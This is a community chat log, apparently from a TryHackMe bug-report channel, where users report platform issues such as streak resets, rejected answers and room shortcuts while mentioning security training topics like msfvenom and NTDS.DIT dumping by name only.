@frosty cape @worthy stag you say u have three good grades, which is better than my two in second year lol. I barely showed up to uni that year, yet I'm on track for a first overall this summer
Yeah, not sure the details obvs, but if you can help not re-doing a year?
Otherwise, at least you have TryHackMe to look forward to:D
plus the 40% weight second year really doesn't affect the 60% of 3rd year, especially when 40 credits of 3rd year is for your own project
Yeah I know, it's more a personal thing as I wanna get as good as I can get
plus I want an actual change to redo the forensics module (Gareths) as it's honeypots
and beautiful
It also allows you to see if the course improved
Yeah fair enough:)
Sorry if this has been said a million times, but is anyone else's hacking streak kind of broken? get going +/- a day and then reset after hitting a week streak
@long osprey it's being fixed
Gotcha okay. Wasn't going to say anything at first but thought about it again and figured I'd ask. Thanks for the reply
@rugged ermine PS Empire doesn't work
I did that lab a couple weeks ago, but it completely nuked my Impacket and I had to revert to a snapshot.
might be a bug or not, tbh i'm not sure. I'm on "Common PrivEsc" room currently talking about Task 8: Exploiting Crontab. The questions lead you through creating a payload with msfvenom but it looks as if it isn't installed on the machine. All questions are set as no input needed so I assume it was a conscious decision but would be nice to have a note saying this? unless it is a mistake that it's missing and should be on there after all lol
@peak egret Not a bug, run msfvenom on your host machine.
AH! wasn't aware. thank you 🙂 disregard my non-bug
in the active directory room, in task 7 question 1, I put the right answers but it says it is wrong. Then I put every possible answer and it still says it is wrong
this is the question: What method allowed us to dump NTDS.DIT?
My streak just randomly reset (as stated in #522158404614225920) i did some rooms yesterday and the day before but now im on 0 (no big deal was only at 2/3 but still...)
After an hour anthem shut down on its own, I still have 58 minutes remaining.
Raised it @median sapphire
@rare swallow Ah, alright 🙂
Been raised a few times
I also can't rdp back in 🤔
Please do not post answers @flint dragon
ok
You can post what you think is a bug, just don't post answers / spoilers, thanks.
I think there is a bug on the Hacking with Powershell at task 3 question 3. I input the correct answer and it tells me that is not the correct answer. I've done the steps mentioned and the other questions are correctly inputted
is it ok now @topaz venture
?
@flint dragon Not a bug
You are not filtering the cmdlets from functions and aliases
Thank you @median sapphire
Do you guys know that when you deploy kali machine it says it has 8gb ram but it has 4 actually ?
Hello #685858111952781324 #site-bugs I think there is a regression due to the last deployment in the public profile yearly activity. The last case was on 2nd, May
@frosty cape I don't think there is a bug here?
There are 3 actions it counts. Deploy-vm/Answer-question/deploy-downloadable
Looking at your profile, its calculating your events correctly.
@frosty cape there is however, a render bug with activity
Where it'll sometimes skip rendering squares on the chart, but the data was returned by the API
there is a way to get a nice shortcut on step 1 of peakhill, i guess it's not intended
@frosty cape it has been fixed some days later
Or it was a temporary bug ^^ but it's displayed well for one week
It might be the same one Szymex found
@sullen vessel Feel free to DM me
i think i shortcutted both steps in fact
@short jackal Found a shortcut that I'm patching now
(everything was handled in DM)
both steps? 🤔
@potent orchid read the secretsdump output
Thanks for the quick tips guys!
@short jackal: the end of the first part, and the full second part*
I patched those two things that were reported (hopefully they are good now??) so please do let me know if you clever h@x0rs find any other unintentionals
Hello in the Introductory Networking room Task 6 Question 2 the IP address i receive and IP address room wants are different. (First time writing, sorry if my writing format is wrong)
@ornate ivy What does the question ask?
Ping tryhackme.com
What is the IP address?
oky thnx for your time
Ooooh this could be the first victim of cloudflare caching
or they could just need to refresh
The question was changed to ping blog.tryhackme.com
Which isn't behind cloudflare
I've just confirmed, it has been updated
Oh
But the cloudflare caching....
@ornate ivy Could you screenshot the question?
The blog IP address is completely different to the site address though
So either way the answer would be wrong
Np 🙂
i either found a bug in Corp room or i don't have enough knowledge to solve it who should i ask about that?

